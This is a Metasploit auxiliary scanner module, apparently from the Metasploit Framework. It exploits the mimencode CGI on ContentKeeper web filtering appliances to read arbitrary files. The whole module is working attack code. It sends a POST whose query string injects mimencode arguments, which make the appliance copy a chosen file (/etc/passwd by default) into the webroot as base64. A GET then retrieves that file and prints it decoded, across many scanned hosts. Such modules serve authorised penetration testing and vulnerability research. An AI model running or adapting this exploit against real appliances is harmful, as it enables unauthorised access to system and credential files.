##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
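class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::HttpClient
  include Msf::Auxiliary::Scanner

  # Module metadata plus the two user-settable options: FILE (the path the
  # appliance is asked to read) and URL (the path to the mimencode CGI).
  def initialize
    super(
      'Name' => 'ContentKeeper Web Appliance mimencode File Access',
      'Description' => %q{
        This module abuses the 'mimencode' binary present within
        ContentKeeper Web filtering appliances to retrieve arbitrary
        files outside of the webroot.
      },
      'References' => [
        ['OSVDB', '54551'],
        ['URL', 'http://www.aushack.com/200904-contentkeeper.txt'],
      ],
      'Author' => ['aushack'],
      'License' => MSF_LICENSE
    )

    register_options(
      [
        OptString.new('FILE', [true, 'The file to traverse for', '/etc/passwd']),
        OptString.new('URL', [true, 'The path to mimencode', '/cgi-bin/ck/mimencode'])
      ]
    )
  end

  # Sends the POST to the mimencode CGI and, when the appliance answers 500,
  # fetches the temporary output file from the webroot and prints its
  # base64-decoded body. Any other HTTP status is reported as an error.
  #
  # @param _ip [String] host handed in by the Scanner mixin; unused here
  #   because rhost/rport come from the HttpClient mixin
  # @return [void]
  def run_host(_ip)
    # Store the base64 encoded traversal data in a hard-to-brute filename, just in case.
    tmpfile = Rex::Text.rand_text_alphanumeric(20)

    print_status("Attempting to connect to #{rhost}:#{rport}")
    res = send_request_raw(
      {
        'method' => 'POST',
        'uri' => normalize_uri(datastore['URL']) + '?-o+' + '/home/httpd/html/' + tmpfile + '+' + datastore['FILE']
      }, 25
    )

    # A 500 from the CGI is treated as the signal that mimencode ran; it is a
    # heuristic, so the follow-up GET is what actually confirms success.
    if res && (res.code == 500)
      print_good("Request appears successful on #{rhost}:#{rport}! Response: #{res.code}")

      file = send_request_raw(
        {
          'method' => 'GET',
          'uri' => '/' + tmpfile
        }, 25
      )

      if file && (file.code == 200)
        print_status("Request for #{datastore['FILE']} appears to have worked on #{rhost}:#{rport}! Response: #{file.code}\r\n#{Rex::Text.decode_base64(file.body)}")
      elsif file && file.code
        # Report the status/body of the GET that failed, not the earlier POST
        # (which is known to be a 500 on this branch).
        print_error("Attempt returned HTTP error #{file.code} on #{rhost}:#{rport} Response:\r\n#{file.body}")
      end
    elsif res && res.code
      print_error("Attempt returned HTTP error #{res.code} on #{rhost}:#{rport} Response:\r\n#{res.body}")
    end
  # Transport-level failures are swallowed so run_host returns normally and the
  # scanner proceeds to the next host.
  rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
  rescue ::Timeout::Error, ::Errno::EPIPE
  end
end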